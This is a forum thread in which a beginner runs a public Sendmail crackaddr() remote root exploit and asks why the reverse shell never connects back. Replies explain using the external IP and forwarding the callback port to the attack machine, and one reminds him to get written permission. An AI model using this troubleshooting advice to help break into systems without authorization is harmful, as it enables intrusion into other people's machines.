
Thread: remote exploit bug

  1. #1
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    16

    remote exploit bug

    hello
    i'm a starter in linux security.
    i am now trying to exploit the crackaddr() bug in the sendmail 8.10.x versions.

    here's how it goes:


    --------------------------------
    vreezver@Linux:[$] ./exploit <target_ip> <my_ip> <targer_number>
    # target number here is 0

    Sendmail <8.12.8 crackaddr() exploit by bysin
    from the l33tsecurity crew

    Resolving address... Address found
    Connecting... Connected!
    Sending exploit... Exploit sent!
    Waiting for root prompt... # instead of getting a shell prompt nothing happens.

    vreezver@Linux:[$]
    -------------------------------------------------------
    i'm working through a lan and getting access to the internet from a server

    - maybe this root prompt less is due to a firewall blocking

    -maybe i should use my extern ip address instead of the one i am using inside the lan

    i'd like to know what is the real trouble
    i am using a Linux/Knoppix 5.1.1 version based on a 2.6.19 kernel.

    thanx for responding to me
    Edited by -=Xploitz=-
    thanx

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    vreezver

    There is no need to post your e-mail address. If they know the answer, or want to offer you hints... they will. They will post it publicly here so that all may see and learn from it. You're not special.

    Thanks.
    --=Xploitz=-- ®
    Remote-Exploit.orgs Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial": http://forums.remote-exploit.org/showthread.php?t=9063
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial": http://forums.remote-exploit.org/showthread.php?t=7872
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial": http://forums.remote-exploit.org/showthread.php?t=8230
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases": http://forums.remote-exploit.org/showthread.php?t=8041

  3. #3
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    16


    ok i didn't mean to look special
    i prefer them to respond publicly
    thanx

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    No worries.

    Just remember for next time.

  5. #5
    thorin
    My life is this forum
    Join Date
    Jan 2010
    Posts
    2,629


    Originally posted by vreezver:
    --------------------------------
    vreezver@Linux:[$] ./exploit <target_ip> <my_ip> <targer_number>
    # target number here is 0

    Sendmail <8.12.8 crackaddr() exploit by bysin
    from the l33tsecurity crew

    Resolving address... Address found
    Connecting... Connected!
    Sending exploit... Exploit sent!
    Waiting for root prompt... # instead of getting a shell prompt nothing happens.
    -------------------------------------------------------
    i'm working through a lan and getting access to the internet from a server

    - maybe this root prompt less is due to a firewall blocking

    Could be.

    -maybe i should use my extern ip address instead of the one i am using inside the lan

    If you're trying to connect to an external IP you'll need to provide your external IP (since from the outside looking in your internal IP isn't reachable... you might wanna read RFC 1918 and brush up on some IP routing information). However, if you're connecting to an external IP you better be sure you have written permission.

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124


    If you're using Knoppix as your attack machine this really has nothing to do with BackTrack. The problem is most likely the service is not vulnerable. This happens because of updates or the wrong version. If you're sure the version is exploitable then the next issue is usually your router or server. You must be clear on which port your exploit is returning on and forward it to your attack machine. For example, if I send an exploit and it sends back a reverse shell on port 5000, then port 5000 on my firewalled router must be forwarded to the internal IP of my attack machine. If you are exploiting across the net then yes, you should be using your external IP. If you send a command to return on 192.168.1.100 then that's not going to work for obvious reasons.

  7. #7
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    16


    ok. thanks thorin,
    but what i am saying is that i'm getting a remote shell without being able to access it. what could be the problem?

  8. #8
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    16


    If you're sure the version is exploitable then the next issue is usually your router or server
    ok. purehate, we had already realised it but with no assurance; we think it's a router problem.

    you must be clear on which port your exploit is returning on and forward it to your attack machine.
    so you mean i "should be clear" in my source on the returning port right?

  9. #9
    thorin
    My life is this forum
    Join Date
    Jan 2010
    Posts
    2,629


    Uh earlier you said no shell.
    "instead of getting a shell prompt nothing happens."
    So which is it?

  10. #10
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    16


    uh...
    the exploit worked successfully
    and prints out : <<exploit sent>>
    and then << waiting for root prompt>>

    this means the root was sent but we didn't receive it
